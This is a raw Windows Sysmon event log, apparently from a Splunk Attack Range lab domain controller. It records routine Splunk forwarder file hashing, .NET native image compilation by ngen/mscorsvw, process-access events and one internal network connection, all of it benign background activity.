AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000018692Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.004{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3ACE52486ED9F1CFFE337C1732B0A22D,SHA256=1D15C7BDF43B58AC9C8FA14010735CF0A8C288DF7C92B0BDFA0DD734FE2BDA10,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018722Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:59.787{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A10B-60D3-5E02-00000000CF01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018721Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:00:59.787{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018720Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:59.787{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018719Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:00:59.787{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018718Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:59.787{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018717Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:59.771{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A10B-60D3-5E02-00000000CF01}5784C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018716Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:59.771{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A10B-60D3-5E02-00000000CF01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000018715Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:59.772{4DB9351A-A10B-60D3-5E02-00000000CF01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000018714Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:59.365{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BD24E775ED5F7F4C0AE2FAD68A65A59B,SHA256=58980F914A9D39F68ED4FC7C3187F17B2D3DC6E33F3CF1D4A67975D02B825E2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018713Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:59.021{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0071B5EE8BF91FE76A357B7B3559986C,SHA256=37670B8E904008361E8E1444B447E1E013EE26BBDB49F6978C84EDD6F42732D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018724Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:00.787{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0DFD5006FF91862D137B422F36EF263C,SHA256=D69F9FAB26FBE579F9414415A195BE594448CED6A379F52C9D0EC8CAFB35B598,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018723Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:00.037{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E49EB91084852FCD1C2551E7507E78A9,SHA256=C436E76538D9B08914853620884CFC1AC12941CD6866C6B72D107440ADE95EEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018725Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:01.084{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E34515AB3878B8EB2ABAE4C1128A5E6D,SHA256=6F709DDAB09975D8BCCEC465F238320C30DCDD54C9925B78F40CD4B311737899,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000018727Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:00.216{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61364-false10.0.1.12-8000- 23542300x800000000000000018726Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:02.099{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CDA80344BE493817CBE36EC1421CE6F,SHA256=BF6129A1C4AFBA6F35B44049BB0F7904E94C34E61EF10D808B606AD841013D66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018728Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:03.115{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD78A392DA940A99AC15BC6AB6698303,SHA256=52917F598EA05D292BCB5F8635DBFD26BAE1413AC9F617EAA80E09CC4813B000,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018732Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:04.896{4DB9351A-A10A-60D3-5D02-00000000CF01}4276NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\HER0Y5XJ3W\System.Design.ni.dll.auxMD5=D7A0DAF439CBF822EF1F0FC519546D22,SHA256=ECD2438DFCD947364F742B17816F9E98069B290C1B6C7B1A5B513C0EFACA4EF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018731Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:04.896{4DB9351A-A10A-60D3-5D02-00000000CF01}4276NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\HER0Y5XJ3W\System.Design.ni.dllMD5=E0F70BDE57A9C3BCB0376363B612D788,SHA256=C8F6F5B03BBA740EADFF096F78189CE7F631C15B1569A23BDA7904397D815BD9,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018730Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:04.568{4DB9351A-A10A-60D3-5D02-00000000CF01}4276C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\10b4-0\System.Design.dll2021-06-23 21:01:04.568 23542300x800000000000000018729Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:04.130{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C5F6DC6A9744CCFEE7A54FD7BACCD83,SHA256=AEFCA3A50A672316A4A6C5E534D413ED84ECD73654A55C9B7EEAEA852522E3FB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018748Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:05.615{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A111-60D3-6202-00000000CF01}6456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018747Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:05.599{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A111-60D3-6202-00000000CF01}6456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018746Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:05.599{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A111-60D3-6202-00000000CF01}6456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018745Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:05.490{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A111-60D3-6102-00000000CF01}5968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000018744Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:05.474{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A111-60D3-6102-00000000CF01}5968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018743Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:05.474{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A111-60D3-6102-00000000CF01}5968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018742Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:05.412{4DB9351A-A111-60D3-6002-00000000CF01}7096NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\M3891CDO3Z\System.Device.ni.dll.auxMD5=931650146A6264DC138938B4E3D779AD,SHA256=3046C50E9EBE5BEF8F843FCBEFB229D5EB561E890114C52EB442B67D70CB4E1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018741Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:05.412{4DB9351A-A111-60D3-6002-00000000CF01}7096NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\M3891CDO3Z\System.Device.ni.dllMD5=0D4F1813E61D936C5381B2FB80324E4A,SHA256=8ADB33FAFE0738CF075429939409C98BB69A760F340207401161A7F1BAA34FB7,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018740Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:05.396{4DB9351A-A111-60D3-6002-00000000CF01}7096C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1bb8-0\System.Device.dll2021-06-23 21:01:05.396 10341000x800000000000000018739Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:05.255{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A111-60D3-6002-00000000CF01}7096C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018738Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:05.240{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A111-60D3-6002-00000000CF01}7096C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018737Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:05.240{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A111-60D3-6002-00000000CF01}7096C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018736Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:05.177{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A111-60D3-5F02-00000000CF01}1272C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
